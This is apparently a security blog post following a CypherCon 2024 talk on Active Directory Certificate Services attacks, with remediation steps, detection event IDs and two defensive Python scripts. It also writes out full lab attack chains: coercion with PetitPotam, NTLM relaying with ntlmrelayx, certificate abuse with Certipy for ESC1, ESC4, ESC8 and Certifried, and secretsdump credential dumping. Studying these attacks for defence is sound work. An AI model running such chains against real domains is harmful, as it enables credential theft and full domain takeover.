Attacks on Active Directory Certificate Services (AD CS) Explained - CypherCon 2024 Follow-up

Ryan Zagrodnik

This is a follow-up blog post from our CypherCon 2024 presentation. The slides are located here: https://x.com/TheL0singEdge/status/1776101737461399780

Active Directory Certificate Services (AD CS) is a crucial component of many organizations' security infrastructure, responsible for public key infrastructure (PKI) and managing digital certificates. Despite its importance, AD CS can also be a target for various security threats. This blog post delves into common vulnerabilities in AD CS, explains how these can be exploited, and outlines effective remediation strategies to protect your systems.

TL;DR Here's How to Check and Fix:

Secure your HTTP endpoints (mitigates KrbRelayUp/PetitPotam/others)

  • Remove all AD CS HTTP endpoints (best option)
  • If that is not possible:
    • Enforce HTTPS and Extended Protection for Authentication (EPA)
  • Also helps:
    • Disable NTLM authentication on IIS and on your AD CS servers
  • PowerShell scripts to discover overly-permissive ACLs on AD objects
  • Discover the dangerous flag on the Certificate Authority (CA)
    • Check if the flag is set:
      • certutil -getreg policy\EditFlags
    • If EDITF_ATTRIBUTESUBJECTALTNAME2 is set on ANY CA, it can be abused
      • Unset the dangerous flag:
        • certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
  • PSPKIAudit: a PowerShell toolkit for auditing AD CS
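The certutil check above prints EditFlags as a hex DWORD followed by the individual flag names. The script below, added here as an example and not part of the original post or any of the tools it references, decodes that output and decides from the bit value (0x40000, the value of EDITF_ATTRIBUTESUBJECTALTNAME2 in certsrv.h) rather than from the flag-name listing, so it is not fooled by a localized or truncated dump, and emits the same certutil fix command the checklist gives. The two sample outputs are constructed, abbreviated dumps: 0x15014e is the Windows default 0x11014e with the dangerous bit set. The CA config string ca01.essos.local\lab-CA is a placeholder.

```python
"""Decode 'certutil -getreg policy\\EditFlags' output and flag the SAN-attribute bit.

Run the certutil command on (or with -config against) each CA, feed its output
to audit_editflags(). Sample outputs below are constructed for this example.
"""
import re

# EditFlags bit that lets any enrollee inject a Subject Alternative Name through
# request attributes. Value from certsrv.h: 0x40000 (262144).
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000

# Constructed, abbreviated output for a CA with the dangerous bit set (not a real CA).
DANGEROUS_CA = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\lab-CA\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""

# Constructed output for a CA carrying the Windows default value 0x11014e (bit clear).
DEFAULT_CA = DANGEROUS_CA.replace("15014e (1376590)", "11014e (1114446)") \
                         .replace("    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)\n", "")


def editflags_value(certutil_output: str) -> int:
    """Extract the EditFlags DWORD; certutil prints it in hex before the decimal."""
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9A-Fa-f]+)", certutil_output)
    if not m:
        raise ValueError("no 'EditFlags REG_DWORD' line in certutil output")
    return int(m.group(1), 16)


def has_san_attribute_flag(certutil_output: str) -> bool:
    """True when EDITF_ATTRIBUTESUBJECTALTNAME2 is set, judged by the bit, not the name list."""
    return bool(editflags_value(certutil_output) & EDITF_ATTRIBUTESUBJECTALTNAME2)


def audit_editflags(certutil_output: str, ca_config: str = "") -> dict:
    """Return the decoded value, whether it is vulnerable, the corrected value and the fix."""
    value = editflags_value(certutil_output)
    vulnerable = bool(value & EDITF_ATTRIBUTESUBJECTALTNAME2)
    # Same command as the checklist; -config lets you run it against a remote CA.
    target = f' -config "{ca_config}"' if ca_config else ""
    return {
        "editflags": value,
        "vulnerable": vulnerable,
        "fixed_editflags": value & ~EDITF_ATTRIBUTESUBJECTALTNAME2,
        "fix": (f"certutil{target} -setreg policy\\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2"
                if vulnerable else None),
    }


if __name__ == "__main__":
    # ca01.essos.local\lab-CA is a placeholder CA config string for this example.
    for name, output in (("lab-CA (dangerous)", DANGEROUS_CA), ("lab-CA (default)", DEFAULT_CA)):
        r = audit_editflags(output, ca_config="ca01.essos.local\\lab-CA")
        print(f"{name}: EditFlags=0x{r['editflags']:x} vulnerable={r['vulnerable']}")
        if r["fix"]:
            print("  fix:", r["fix"], "(then restart the CertSvc service)")
```

The flag only takes effect after the CertSvc service is restarted, so a CA whose dump still shows the bit after you ran the -setreg command has simply not been restarted yet; re-run the check after the restart and keep the script output as the audit record.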

Most Common Coercion Vulnerabilities:

These vulnerabilities "coerce" your Domain Controller into authenticating to us 🙂

  • PrinterBug (MS-RPRN)
  • PetitPotam (MS-EFSR)
  • ShadowCoerce (MS-FSRVP)
  • DFSCoerce (Distributed File System (DFS): Namespace Management Protocol (MS-DFSNM))

No Full Patches

  • Probably never will be, because the abuse is intended functionality and M$ would have to get rid of NTLM altogether.
  • Most of these, ShadowCoerce excepted, are still exploitable with valid domain credentials.
  • Ensure NetNTLMv1 is disabled on all of your Domain Controllers!

Demo - ESC8 - Coerce to Domain Admin using Game of Active Directory:

Source: https://mayfly277.github.io/posts/GOADv2-pwning-part6/

certipy find -u 'robb.stark' -dc-ip 192.168.56.11 -p 'sexywolfy'

Responder.py -I vboxnet0 --disable-ess --lm

PetitPotam.py 192.168.56.1 meereen.essos.local

To make this attack work we will need:

  • AD CS running on the domain with web enrollment enabled.
  • A working coercion method (authenticated PrinterBug or another coercion method).
  • A template to exploit ESC8; one exists by default in Active Directory: DomainController.
  • Web enrollment running: http://192.168.56.23/certsrv/certfnsh.asp

ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

PetitPotam.py 192.168.56.1 meereen.essos.local

gettgtpkinit.py -pfx-base64 $(cat cert.b64) 'essos.local'/'meereen$' 'meereen.ccache'

Get a TGT for meereen so we can launch a DCSync and dump all of the ntds.dit content.

export KRB5CCNAME=meereen.ccache

secretsdump.py -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local

Demo - ESC8 - when an Enrollment Service has installed and enabled Web Enrollment via HTTP:

  1. Request certificate template information.
  2. Template TestUser allows:
    • "Enroller Supplies Subject"
    • "Enrollment Rights to Domain Computers"
  3. Request a certificate under the context of reguser (a user with only Domain Users privileges) with an SPN for the Domain Administrator "[email protected]".
  4. Take the supplied certificate (administrator_dc.pfx) and request a TGT, then the NTLM hash.
  5. Profit. DCSync, etc. - See https://github.com/ly4k/Certipy/blob/main/README.md#esc1

Demo - ESC1 - when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN):

  1. List certificates available (show esc4 template)
  2. Abuse write permissions of domain users and make template vulnerable to Escalation 1.
  3. Display original and overwritten certificate side by side.
  4. Escalation 1.
    • "Enroller Supplies Subject"
    • "Enrollment Rights to Domain Computers"
    • Request a certificate under the context of bob (a user with only Domain Users privileges) with an SPN for the Domain Administrator "[email protected]".
    • Take the supplied certificate (administrator.pfx) and request a TGT, then the NTLM hash.
  5. Profit. For example, extract the krbtgt hash for further attacks.

certipy-ad find -u bob -dc-ip 192.168.101.250 -text -output original

certipy-ad find -u bob -dc-ip 192.168.101.250 -text -output overwritten

certipy-ad template -dc-ip 192.168.101.250 -username bob -template 'Escalation4Template' -save-old

certipy-ad req -username bob -ca drop-lemon-ca -template 'Escalation4Template' -upn [email protected] -dc-ip 192.168.101.250

certipy-ad auth -dc-ip 192.168.101.250 -pfx administrator.pfx

impacket-secretsdump 'drop.labs/[email protected]' -target 192.168.101.250 -just-dc-user krbtgt -hashes aad3b435b51404eeaad3b435b51404ee:5d826aa79e790881c2042aad77d0e6a1

Demo - ESC4 - when a user has write privileges over a certificate template. This can, for instance, be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.

Shows ESC4 to ESC1 again, this time using a machine account.

PreReq - Control over a Domain User account.

  1. Templates only allow Domain Computers to enroll (think machine certificates for 802.1X).
  2. The default policy allows Domain Users to create 10 machine accounts, so let's create one called regusersPC.
  3. Repeat Escalation 1.
  4. Template TestUser allows:
    • "Enroller Supplies Subject"
    • "Enrollment Rights to Domain Computers"
  5. Request a certificate under the context of reguserPC (an account with only Domain Computers privileges) with an SPN for the Domain Administrator "[email protected]".
  6. Take the supplied certificate (administrator_dc.pfx) and request a TGT, then the NTLM hash.
  7. Profit. DCSync, etc.

Demo - Certifried (CVE-2022-26923) - abuses Active Directory Certificate Services (AD CS) to request machine certificates with arbitrary attacker-controlled DNS host names. Patched as part of Microsoft's May 2022 security updates:

  1. Create a machine account (testmachine) using a domain user account.
    • Certipy creates the machine account and sets its dNSHostName attribute to the domain controller's fully qualified hostname.
  2. Request a certificate using the default Machine template.
  3. Requesting a certificate with the testmachine account and the modified dNSHostName causes the CA to issue a certificate for the DC (dc01.bysurvey.com).
  4. Take the supplied certificate dc01.pfx and request a TGT, then the NTLM hash.

https://www.hackthebox.com/blog/cve-2022-26923-certifried-explained
https://tryhackme.com/r/room/cve202226923

Detecting Potential Abuse:

  • Event ID 4886
    • Certificate Services received a certificate request.
  • Event ID 4877/4876
    • Certificate Services approved a certificate request and issued a certificate.
  • Event ID 5058/5061
    • Account Used Key Storage Provider on Key File
  • Event ID 5059
    • Account Used KSP Exported a Key File
  • Event ID 4663
    • Process Access Private Key
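The request/issuance events above are only useful if you correlate them: the signal in every demo on this page is a certificate whose identity (the SAN UPN, the SAN DNS name, or the template class) does not match the account that requested it. The script below is an added example, not part of the original post or of Certipy, PSPKIAudit or any other tool named here. It pairs the 4886 "request received" event with the issuance event, which the CA's Security log writes as event ID 4887, by Request ID and flags three mismatches: a SAN UPN naming a different principal than the requester, a machine account whose SAN DNS name is another host, and a non-machine account issued a machine-only template. The sample events are constructed and use simplified field names, not the exact Windows event schema; the machine-only template set is an assumed baseline. Note that none of these events exist unless the "Audit Certification Services" subcategory is enabled on the CA and the CA's AuditFilter covers request and issuance (certutil -setreg CA\AuditFilter 127 turns on all CA audit events).

```python
"""Correlate AD CS audit events (4886 request received, 4887 certificate issued)
and flag issuances whose identity does not match the requester.

Sample events are constructed for this example; field names are simplified
from the event message text, not the exact Windows event XML.
"""
import re

EVT_REQUEST_RECEIVED = 4886   # Certificate Services received a certificate request
EVT_CERT_ISSUED = 4887        # Certificate Services approved a request and issued a certificate

# Templates that should only ever be issued to machine accounts (names end in '$').
# Assumed baseline for this example; extend with your own machine-only templates.
MACHINE_ONLY_TEMPLATES = {"DomainController", "Machine", "KerberosAuthentication"}

SAMPLE_EVENTS = [
    # 101: benign, a user enrolls for a User certificate carrying its own UPN
    {"id": 4886, "request_id": 101, "requester": "ESSOS\\robb.stark",
     "attributes": "CertificateTemplate:User"},
    {"id": 4887, "request_id": 101, "requester": "ESSOS\\robb.stark",
     "attributes": "CertificateTemplate:User", "subject": "CN=robb.stark",
     "san": "upn=robb.stark@essos.local"},
    # 102: supplied SAN names a different principal than the requester (ESC1/ESC6 footprint)
    {"id": 4886, "request_id": 102, "requester": "ESSOS\\robb.stark",
     "attributes": "CertificateTemplate:TestUser"},
    {"id": 4887, "request_id": 102, "requester": "ESSOS\\robb.stark",
     "attributes": "CertificateTemplate:TestUser", "subject": "CN=administrator",
     "san": "upn=administrator@essos.local"},
    # 103: a machine account's SAN DNS name belongs to the DC (Certifried footprint)
    {"id": 4886, "request_id": 103, "requester": "ESSOS\\testmachine$",
     "attributes": "CertificateTemplate:Machine"},
    {"id": 4887, "request_id": 103, "requester": "ESSOS\\testmachine$",
     "attributes": "CertificateTemplate:Machine", "subject": "CN=meereen.essos.local",
     "san": "dns=meereen.essos.local"},
    # 104: a plain user account issued a DomainController-template certificate
    {"id": 4886, "request_id": 104, "requester": "ESSOS\\robb.stark",
     "attributes": "CertificateTemplate:DomainController"},
    {"id": 4887, "request_id": 104, "requester": "ESSOS\\robb.stark",
     "attributes": "CertificateTemplate:DomainController", "subject": "CN=meereen.essos.local"},
]


def account_name(requester: str) -> str:
    """'ESSOS\\robb.stark' -> 'robb.stark'; 'ESSOS\\meereen$' -> 'meereen$' (lower-cased)."""
    return requester.split("\\")[-1].lower()


def parse_san(san: str) -> dict:
    """Parse 'upn=a@b, dns=host.b' into {'upn': 'a@b', 'dns': 'host.b'}, lower-cased."""
    out = {}
    for part in san.split(","):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            out[key.strip().lower()] = value.strip().lower()
    return out


def template_of(attributes: str) -> str:
    """Pull the template name out of the event's Attributes field."""
    m = re.search(r"CertificateTemplate:([^\s,;]+)", attributes, re.I)
    return m.group(1) if m else ""


def check_issuance(issued: dict) -> list:
    """Return human-readable findings for one issuance event (empty list = looks normal)."""
    findings = []
    acct = account_name(issued["requester"])
    is_machine = acct.endswith("$")
    template = template_of(issued.get("attributes", ""))
    san = parse_san(issued.get("san", ""))
    if template in MACHINE_ONLY_TEMPLATES and not is_machine:
        findings.append(f"user account {acct} issued machine-only template {template}")
    upn = san.get("upn")
    if upn and upn.split("@")[0] != acct.rstrip("$"):
        findings.append(f"SAN UPN {upn} does not match requester {acct}")
    dns = san.get("dns")
    if dns and is_machine and dns.split(".")[0] != acct.rstrip("$"):
        findings.append(f"SAN DNS {dns} does not match machine account {acct}")
    return findings


def correlate(events: list) -> dict:
    """Pair 4886 with 4887 by Request ID; return {request_id: [findings]} for suspicious ones."""
    received = {e["request_id"]: e for e in events if e["id"] == EVT_REQUEST_RECEIVED}
    alerts = {}
    for e in events:
        if e["id"] != EVT_CERT_ISSUED:
            continue
        findings = check_issuance(e)
        req = received.get(e["request_id"])
        if req is None:
            findings.append("issued without a matching 4886 request event")
        elif account_name(req["requester"]) != account_name(e["requester"]):
            findings.append("requester differs between 4886 and 4887")
        if findings:
            alerts[e["request_id"]] = findings
    return alerts


if __name__ == "__main__":
    for request_id, findings in sorted(correlate(SAMPLE_EVENTS).items()):
        print(f"request {request_id}:")
        for f in findings:
            print("  -", f)
```

Request 101 produces no alert; 102, 103 and 104 each produce one. In production, feed the script the parsed 4886/4887 events from your SIEM and add the 4887 Subject field to the comparison once you know how your templates populate it; a clean 4886/4887 pair with a mismatched SAN is the moment to revoke the certificate and, for a SAN naming a privileged account, to treat the requester as compromised.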

References:

  1. Certipy 4.0 - ESC9 and ESC10 - https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
  2. Certipy - https://github.com/ly4k/Certipy
  3. Certified Pre-Owned Blog - https://posts.specterops.io/certified-pre-owned-d95910965cd2
  4. Certified Pre-Owned Whitepaper - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
  5. PSPKIAudit - https://github.com/GhostPack/PSPKIAudit
  6. Microsoft "Securing PKI" - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786423(v=ws.11)
  7. Abusing Active Directory Certificate Services (Part 3) - https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
  8. ADCShunter - https://github.com/danti1988/adcshunter
  9. Shadow Credentials: Workstation takeover edition - https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition
  10. ADCS Attack Paths in BloodHound - https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-1-799f3d3b03cf
  11. TryHackMe - https://tryhackme.com/room/adcertificatetemplates and https://tryhackme.com/room/cve202226923
  12. ADCSCoercePotato - https://github.com/decoder-it/ADCSCoercePotato/
  13. Top 10 Ways to Improve Active Directory Security Quickly - Trimarc Security - https://youtu.be/Og5xfph7Gt0
  14. ESC11 - https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
  15. ESC12 - https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm
  16. ESC13 - https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
  17. Certified Pre-Owned: Abusing Active Directory Certificate Services - https://youtu.be/ejmAIgxFRgM
  18. Exploiting CVE-2022-26923 by Abusing AD CS | TryHackMe - https://youtu.be/HBRCI5O35R8

Stay safe out there on the cybers - @TheLosingEdge
